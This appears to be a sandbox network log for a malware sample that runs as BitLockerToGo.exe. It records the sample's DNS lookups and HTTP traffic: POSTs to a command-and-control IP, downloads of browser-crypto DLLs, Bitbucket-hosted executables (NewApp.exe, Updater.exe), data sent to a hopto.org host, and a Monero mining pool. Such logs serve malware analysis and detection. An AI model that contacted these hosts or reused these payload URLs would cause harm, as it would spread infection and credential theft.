Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
X-Usage-Quota-Remaining: 950920.181
X-Usage-Request-Cost: 39699.20
X-Usage-User-Time: 1.087623
X-Usage-System-Time: 0.103353
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 1accf5bf39c544efba03694af767c8ce
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Server-Timing: atl-edge;dur=1439,atl-edge-internal;dur=3,atl-edge-upstream;dur=1438,atl-edge-pop;desc="aws-eu-west-1"
-
Remote address:8.8.8.8:53Request23.142.166.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestbbuseruploads.s3.amazonaws.comIN AResponsebbuseruploads.s3.amazonaws.comIN CNAMEs3-1-w.amazonaws.coms3-1-w.amazonaws.comIN CNAMEs3-w.us-east-1.amazonaws.coms3-w.us-east-1.amazonaws.comIN A3.5.16.13s3-w.us-east-1.amazonaws.comIN A16.182.71.105s3-w.us-east-1.amazonaws.comIN A54.231.228.41s3-w.us-east-1.amazonaws.comIN A52.216.37.97s3-w.us-east-1.amazonaws.comIN A16.182.38.177s3-w.us-east-1.amazonaws.comIN A3.5.28.154s3-w.us-east-1.amazonaws.comIN A54.231.197.129s3-w.us-east-1.amazonaws.comIN A52.216.51.145
-
GEThttps://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374BitLockerToGo.exeRemote address:3.5.16.13:443RequestGET /3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Cache-Control: no-cache
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
x-amz-request-id: X6YMGC3GW2H9JD2E
Date: Sat, 05 Oct 2024 08:22:56 GMT
Last-Modified: Thu, 03 Oct 2024 08:02:06 GMT
ETag: "2eea3ddbfc81544b54a4ac5028a30805"
x-amz-server-side-encryption: AES256
x-amz-version-id: Fk1G95uwCTSIHuiL1YR58Oq1fwlhJgaG
Content-Disposition: attachment; filename="NewApp.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 5853680
-
GEThttps://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383BitLockerToGo.exeRemote address:3.5.16.13:443RequestGET /3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Cache-Control: no-cache
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
x-amz-request-id: YDXD9SKQJ8PBGEAE
Date: Sat, 05 Oct 2024 08:23:04 GMT
Last-Modified: Thu, 03 Oct 2024 08:02:06 GMT
ETag: "925ec45b5ac88ab7af039190589204b9"
x-amz-server-side-encryption: AES256
x-amz-version-id: lceKswdw3_ZaYw5A4dJzcUOjLOVj1QhX
Content-Disposition: attachment; filename="Updater.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 5699232
-
Remote address:8.8.8.8:53Requestocsp.r2m01.amazontrust.comIN AResponseocsp.r2m01.amazontrust.comIN A18.238.246.206
-
GEThttp://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3DBitLockerToGo.exeRemote address:18.238.246.206:80RequestGET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.r2m01.amazontrust.com
ResponseHTTP/1.1 200 OK
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: max-age=7200
Date: Sat, 05 Oct 2024 06:24:08 GMT
Last-Modified: Sat, 05 Oct 2024 06:24:08 GMT
Server: ECAcc (frc/4CD7)
X-Cache: Hit from cloudfront
Via: 1.1 432282689bafd802e8ec9636c256a3b0.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS58-P1
X-Amz-Cf-Id: Kc_9wOZeo2P8CZ50r6-sWscjmVa5gz56yyasNlouYNFzAJ2NurVqfw==
Age: 7127
-
Remote address:8.8.8.8:53Request197.87.175.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request13.16.5.3.in-addr.arpaIN PTRResponse13.16.5.3.in-addr.arpaIN PTRs3-w us-east-1 amazonawscom
-
Remote address:8.8.8.8:53Request174.15.239.18.in-addr.arpaIN PTRResponse174.15.239.18.in-addr.arpaIN PTRserver-18-239-15-174ams58r cloudfrontnet
-
Remote address:8.8.8.8:53Request80.41.65.18.in-addr.arpaIN PTRResponse80.41.65.18.in-addr.arpaIN PTRserver-18-65-41-80ams1r cloudfrontnet
-
Remote address:8.8.8.8:53Request206.246.238.18.in-addr.arpaIN PTRResponse206.246.238.18.in-addr.arpaIN PTRserver-18-238-246-206ams58r cloudfrontnet
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 499
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:23:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 499
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:23:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 08:23:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestcowod.hopto.orgIN AResponsecowod.hopto.orgIN A45.132.206.251
-
Remote address:45.132.206.251:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: cowod.hopto.org
Content-Length: 2745
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:8.8.8.8:53Request251.206.132.45.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestxmr-eu1.nanopool.orgIN AResponsexmr-eu1.nanopool.orgIN A51.15.65.182xmr-eu1.nanopool.orgIN A146.59.154.106xmr-eu1.nanopool.orgIN A54.37.137.114xmr-eu1.nanopool.orgIN A51.15.193.130xmr-eu1.nanopool.orgIN A51.89.23.91xmr-eu1.nanopool.orgIN A163.172.154.142xmr-eu1.nanopool.orgIN A212.47.253.124xmr-eu1.nanopool.orgIN A162.19.224.121xmr-eu1.nanopool.orgIN A141.94.23.83xmr-eu1.nanopool.orgIN A51.15.58.224xmr-eu1.nanopool.orgIN A54.37.232.103
-
Remote address:8.8.8.8:53Requestpastebin.comIN AResponsepastebin.comIN A172.67.19.24pastebin.comIN A104.20.3.235pastebin.comIN A104.20.4.235
-
Remote address:8.8.8.8:53Request142.154.172.163.in-addr.arpaIN PTRResponse142.154.172.163.in-addr.arpaIN PTR142-154-172-163 instancesscwcloud
-
Remote address:8.8.8.8:53Request24.19.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestxmr-eu1.nanopool.orgIN AResponsexmr-eu1.nanopool.orgIN A163.172.154.142xmr-eu1.nanopool.orgIN A54.37.232.103xmr-eu1.nanopool.orgIN A162.19.224.121xmr-eu1.nanopool.orgIN A141.94.23.83xmr-eu1.nanopool.orgIN A146.59.154.106xmr-eu1.nanopool.orgIN A54.37.137.114xmr-eu1.nanopool.orgIN A51.15.193.130xmr-eu1.nanopool.orgIN A51.15.65.182xmr-eu1.nanopool.orgIN A51.15.58.224xmr-eu1.nanopool.orgIN A51.89.23.91xmr-eu1.nanopool.orgIN A212.47.253.124
-
Remote address:8.8.8.8:53Requestpastebin.comIN AResponsepastebin.comIN A104.20.3.235pastebin.comIN A172.67.19.24pastebin.comIN A104.20.4.235
-
Remote address:8.8.8.8:53Request130.193.15.51.in-addr.arpaIN PTRResponse130.193.15.51.in-addr.arpaIN PTR130-193-15-51 instancesscwcloud
-
Remote address:8.8.8.8:53Request235.3.20.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request91.23.89.51.in-addr.arpaIN PTRResponse91.23.89.51.in-addr.arpaIN PTRvps-2ced4041vpsovhnet
-
Remote address:8.8.8.8:53Request43.229.111.52.in-addr.arpaIN PTRResponse
-
104.82.234.109:443https://steamcommunity.com/profiles/76561199780418869tls, httpBitLockerToGo.exe2.2kB 42.5kB 38 36
HTTP Request
GET https://steamcommunity.com/profiles/76561199780418869HTTP Response
200 -
958 B 2.7kB 11 8
HTTP Request
GET https://49.12.197.9/HTTP Response
200 -
1.4kB 622 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.5kB 2.2kB 10 7
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.6kB 6.4kB 13 10
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.4kB 672 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
6.0kB 605 B 13 7
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
91.1kB 2.5MB 1836 1825
HTTP Request
GET https://49.12.197.9/sqlp.dllHTTP Response
200 -
1.5kB 565 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.5kB 565 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
24.4kB 707.6kB 518 515
HTTP Request
GET https://49.12.197.9/freebl3.dllHTTP Response
200 -
21.7kB 627.8kB 459 456
HTTP Request
GET https://49.12.197.9/mozglue.dllHTTP Response
200 -
16.3kB 464.7kB 341 338
HTTP Request
GET https://49.12.197.9/msvcp140.dllHTTP Response
200 -
9.8kB 266.6kB 199 196
HTTP Request
GET https://49.12.197.9/softokn3.dllHTTP Response
200 -
3.7kB 84.0kB 68 65
HTTP Request
GET https://49.12.197.9/vcruntime140.dllHTTP Response
200 -
71.3kB 2.1MB 1536 1523
HTTP Request
GET https://49.12.197.9/nss3.dllHTTP Response
200 -
2.2kB 565 B 10 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.5kB 2.8kB 10 7
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.5kB 2.2kB 10 7
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.6kB 565 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.4kB 768 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
185.166.142.23:443https://bitbucket.org/hgtbvfd11/123aqd/downloads/Updater.exetls, httpBitLockerToGo.exe1.6kB 14.3kB 19 16
HTTP Request
GET https://bitbucket.org/hgtbvfd11/123aqd/downloads/NewApp.exeHTTP Response
302HTTP Request
GET https://bitbucket.org/hgtbvfd11/123aqd/downloads/Updater.exeHTTP Response
302 -
3.5.16.13:443https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383tls, httpBitLockerToGo.exe420.2kB 12.0MB 8946 8942
HTTP Request
GET https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374HTTP Response
200HTTP Request
GET https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383HTTP Response
200 -
18.238.246.206:80http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3DhttpBitLockerToGo.exe473 B 1.1kB 5 4
HTTP Request
